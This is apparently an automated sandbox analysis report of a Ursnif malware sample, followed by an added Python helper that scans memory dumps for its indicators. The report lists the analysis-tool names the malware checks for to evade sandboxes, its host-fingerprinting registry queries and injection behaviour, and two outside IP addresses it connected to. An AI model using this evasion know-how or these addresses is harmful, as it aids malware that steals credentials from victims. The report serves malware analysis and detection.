            Source: wscript.exe, 00000000.00000002.473880595.000001AF6DBA5000.00000004.00000001.sdmp | Binary or memory string: ERVER.EXE","MMR.EXE","SAMPLE.EXE","WIRESHARK.EXE","FIDDLER.EXE","MULTIPOT.EXE","SANDBOXIECRYPTO.EXE","XXX.EXE","FILEMON.EXE","NETSNIFFER.EXE","SANDBOXIEDCOMLAUNCH.EXE")
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmp | Binary or memory string: IDAG.EXE:V
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmp | Binary or memory string: REGSHOT.EXE
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmp | Binary or memory string: DUMPCAP.EXE
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmp | Binary or memory string: WIRESHARK.EXE
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmp | Binary or memory string: FORTITRACER.EXEA
            Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
            Source: C:\Windows\SysWOW64\regsvr32.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
            Source: C:\Windows\SysWOW64\regsvr32.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
            Source: C:\Windows\System32\wscript.exe TID: 3632 | Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4136 | Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\wscript.exe | File Volume queried: C:\Users\user\AppData\Local FullSizeInformation
            Source: C:\Windows\System32\wscript.exe | File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_0118258E Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, | 5_2_0118258E
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_73701E40 FindFirstFileExA, | 5_2_73701E40
            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData
            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local
            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local\Temp
            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user
            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Documents\desktop.ini
            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Desktop\desktop.ini
            Source: regsvr32.exe, 00000005.00000002.2148791952.0000000001080000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW8
            Source: wscript.exe, 00000000.00000002.485246355.000001AF74400000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: regsvr32.exe, 00000005.00000002.2149144554.0000000001102000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAWa Connection* 6-QoS Packet Scheduler-00002t
            Source: wscript.exe, 00000000.00000002.484198407.000001AF715DC000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000003.1409821295.00000000010F6000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
            Source: wscript.exe, 00000000.00000002.485246355.000001AF74400000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: wscript.exe, 00000000.00000002.485246355.000001AF74400000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: wscript.exe, 00000000.00000002.485246355.000001AF74400000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_736F1FA6 LdrInitializeThunk,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, | 5_2_736F1FA6
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_73733AA0 mov eax, dword ptr fs:[00000030h] | 5_2_73733AA0
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_737339D6 mov eax, dword ptr fs:[00000030h] | 5_2_737339D6
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_737335E0 push dword ptr fs:[00000030h] | 5_2_737335E0
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_73702B0E GetProcessHeap, | 5_2_73702B0E
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_736F1E95 InitializeCriticalSection,TlsAlloc,RtlAddVectoredExceptionHandler,GetLastError, | 5_2_736F1E95

            HIPS / PFW / Operating System Protection Evasion:

            Benign windows process drops PE files
            Source: C:\Windows\System32\wscript.exe | File created: afterbirth.rs.0.dr
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 47.91.16.227 80
            Source: C:\Windows\System32\wscript.exe | Network Connect: 88.99.66.31 187
            Source: regsvr32.exe, 00000004.00000002.2149196006.0000000000DD0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2150842981.0000000003620000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
            Source: regsvr32.exe, 00000004.00000002.2149196006.0000000000DD0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2150842981.0000000003620000.00000002.00000001.sdmp | Binary or memory string: Progman
            Source: regsvr32.exe, 00000004.00000002.2149196006.0000000000DD0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2150842981.0000000003620000.00000002.00000001.sdmp | Binary or memory string: RProgram Managerm
            Source: regsvr32.exe, 00000004.00000002.2149196006.0000000000DD0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2150842981.0000000003620000.00000002.00000001.sdmp | Binary or memory string: Progmanlock

            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, | 5_2_736F1E58
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_0118350A cpuid | 5_2_0118350A
            Source: C:\Windows\SysWOW64\regsvr32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\conspiratorial.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\conspiratorial.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\conspiratorial.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\conspiratorial.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\conspiratorial.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\conspiratorial.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\conspiratorial.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\conspiratorial.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\conspiratorial.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\conspiratorial.zip VolumeInformation
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_736F1BB9 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,LdrInitializeThunk,MapViewOfFile,GetLastError,CloseHandle,GetLastError, | 5_2_736F1BB9
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_0118350A wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, | 5_2_0118350A
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_736F177C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, | 5_2_736F177C
            Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmp | Binary or memory string: procmon.exe
Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmp | Binary or memory string: tcpview.exe
Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmp | Binary or memory string: wireshark.exe
Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmp | Binary or memory string: avz.exe
Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmp | Binary or memory string: cports.exe
Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmp | Binary or memory string: lordpe.exe
Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmp | Binary or memory string: icesword.exe
Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmp | Binary or memory string: ollydbg.exe
Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmp | Binary or memory string: regshot.exe
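The nine process names above are the analysis-tool blocklist held in wscript.exe memory while the VBScript runs; the report's "Tries to detect sandboxes and other dynamic analysis tools (process name ...)" signature is what fires on them. Together with the InstallDate and MachineGuid registry queries earlier in this section, they are the evasion-plus-fingerprinting pattern an analyst should pull out of a dump first. The following Python is an added triage helper, not code from the report or from the sample: it scans a memory dump for exactly these indicators, in both ASCII and UTF-16LE, since the script engine stores VBScript strings as UTF-16. The sample dump bytes are constructed here for illustration, and the three-name threshold for calling the dump evasive is an assumption.

```python
import re
from collections import defaultdict

# Analysis-tool process names listed in the wscript.exe memory dump above.
ANALYSIS_TOOLS = [
    "procmon.exe", "tcpview.exe", "wireshark.exe", "avz.exe", "cports.exe",
    "lordpe.exe", "icesword.exe", "ollydbg.exe", "regshot.exe",
]

# Registry value names the report shows being queried for host fingerprinting.
FINGERPRINT_VALUES = ["MachineGuid", "InstallDate"]


def _patterns(names):
    """One case-insensitive regex per name, matching ASCII or UTF-16LE bytes."""
    compiled = []
    for name in names:
        ascii_form = re.escape(name.encode("ascii"))
        utf16_form = re.escape(name.encode("utf-16-le"))
        compiled.append((name, re.compile(b"(?i)" + ascii_form + b"|" + utf16_form)))
    return compiled


def scan_dump(data: bytes):
    """Return {category: {indicator: [offsets]}} for every indicator in `data`."""
    hits = {"analysis_tools": defaultdict(list),
            "fingerprint_values": defaultdict(list)}
    for category, names in (("analysis_tools", ANALYSIS_TOOLS),
                            ("fingerprint_values", FINGERPRINT_VALUES)):
        for name, pattern in _patterns(names):
            for match in pattern.finditer(data):
                hits[category][name].append(match.start())
    return {category: dict(found) for category, found in hits.items()}


def verdict(hits, min_tools=3):
    """Summarise a scan; min_tools is an assumed threshold, not from the report."""
    distinct_tools = len(hits["analysis_tools"])
    return {
        "tool_names_found": distinct_tools,
        "evasive": distinct_tools >= min_tools,
        "fingerprints_host": bool(hits["fingerprint_values"]),
    }


# Constructed sample region (not taken from the real sample): UTF-16LE strings
# as a script engine would hold them, one ASCII registry path, and filler.
SAMPLE_DUMP = (
    b"\x00" * 16
    + "procmon.exe".encode("utf-16-le") + b"\x00\x00"
    + "Wireshark.exe".encode("utf-16-le") + b"\x00\x00"
    + "ollydbg.exe".encode("utf-16-le") + b"\x00\x00"
    + b"SOFTWARE\\Microsoft\\Cryptography\\MachineGuid\x00"
    + b"unrelated text " * 4
)

if __name__ == "__main__":
    found = scan_dump(SAMPLE_DUMP)
    for category, indicators in found.items():
        for name, offsets in indicators.items():
            print(f"{category}: {name} at {offsets}")
    print(verdict(found))
```

Run it against a raw process dump (for example the .sdmp regions this report names) to confirm the blocklist and the fingerprint lookups are present before spending time on the obfuscated script itself; a hit on several tool names with no corresponding process on the analysis box is the sandbox-evasion tell, not an infection indicator by itself.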

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match | File source: 00000005.00000002.2152427500.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.731175502.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.730795348.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.730921854.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.731097456.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.731198463.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.730980508.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.731140018.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.731043829.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 1096, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match | File source: 00000005.00000002.2152427500.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.731175502.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.730795348.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.730921854.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.731097456.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.731198463.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.730980508.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.731140018.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.731043829.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 1096, type: MEMORY

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation 421 | Winlogon Helper DLL | Process Injection 12 | Software Packing 1 | Credential Dumping | System Time Discovery 1 | Remote File Copy 3 | Data from Local System | Data Encrypted 1 | Remote File Copy 3 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Replication Through Removable Media | Scripting 121 | Port Monitors | Accessibility Features | Scripting 121 | Network Sniffing